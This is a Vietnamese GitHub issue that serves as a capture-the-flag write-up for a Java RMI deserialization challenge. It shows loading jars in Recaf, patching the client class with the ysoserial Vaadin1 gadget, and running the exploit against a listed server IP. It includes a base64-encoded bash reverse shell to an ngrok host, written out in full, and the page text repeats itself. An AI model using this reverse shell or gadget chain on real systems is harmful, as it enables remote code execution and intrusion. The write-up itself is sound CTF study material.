You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Trong đó YmFzaCAtaSA+JiAvZGV2L3RjcC8wLnRjcC5hcC5uZ3Jvay5pby8xNzg5NiAwPiYxCg== là base64 của câu lệnh bash reverse tcp (bash -i >& /dev/tcp/0.tcp.ap.ngrok.io/17896 0>&1)
Nhấn Ctrl + S để lưu lại
Chọn File -> Export program và lưu thành file player.jar
Để trigger được method toString thì mình tìm trên ysoserial: https://github.com/frohoff/ysoserial/search?q=toString
Mình thấy được Payload Vaadin1 có sử dụng đến nó, cụ thể là class BadAttributeValueExpException. Từ đây, mình có thể trigger được toString và chạy được câu lệnh trên local.
Theo mình đoán thì tác giả dùng alpine, và team mình đã test thử các lệnh như ping, nc, wget, curl,.. đều fail, từ đó gây mất nhiều thời gian.
Hôm nay hỏi tác giả thì biết rằng server chạy ubuntu:latest và tác giả có quăng cho mình link để tham khảo reverse shell bằng bash với Runtime exec: https://github.com/welk1n/ReverseShell-Java
Về bài 2, tác giả có gợi ý hướng làm như sau: Tìm chain có thể dẫn tới rce
Brute-force class bằng exception mà server trả về (các class có thể lấy trong ysoserial)
Server sẽ trả về sai SerialUID, sử dụng reflect để chỉnh lại cho đúng
The text was updated successfully, but these errors were encountered:
Đầu tiên, chúng ta tải các tools về
Sau khi tải về, thư mục challenge của ta có các file sau:
Chạy recaf
java -jar recaf-2.12.0-J8-jar-with-dependencies.jar
Chọn File -> Load
Sau đó chọn tệp ascis_player.jar mà tác giả cung cấp:
Chọn File -> Add library
Sau đó chọn tệp ascis_service1.jar mà tác giả cung cấp
Tương tự với tệp ysoserial-master-6eca5bc740-1.jar
Sửa class rmi/ASCISPlayer như sau
YmFzaCAtaSA+JiAvZGV2L3RjcC8wLnRjcC5hcC5uZ3Jvay5pby8xNzg5NiAwPiYxCg==
là base64 của câu lệnh bash reverse tcp (bash -i >& /dev/tcp/0.tcp.ap.ngrok.io/17896 0>&1
)player.jar
Exploit
java -cp 'ascis_service1.jar:ysoserial-master-6eca5bc740-1.jar:player.jar' rmi.ASCISPlayer 207.148.75.135 1337 player1
Ngoài lề
Để trigger được method
toString
thì mình tìm trên ysoserial:https://github.com/frohoff/ysoserial/search?q=toString
Mình thấy được Payload
Vaadin1
có sử dụng đến nó, cụ thể là classBadAttributeValueExpException
. Từ đây, mình có thể trigger đượctoString
và chạy được câu lệnh trên local.Theo mình đoán thì tác giả dùng alpine, và team mình đã test thử các lệnh như ping, nc, wget, curl,.. đều fail, từ đó gây mất nhiều thời gian.
Hôm nay hỏi tác giả thì biết rằng server chạy ubuntu:latest và tác giả có quăng cho mình link để tham khảo reverse shell bằng bash với Runtime exec:
https://github.com/welk1n/ReverseShell-Java
Về bài 2, tác giả có gợi ý hướng làm như sau: Tìm chain có thể dẫn tới rce
The text was updated successfully, but these errors were encountered: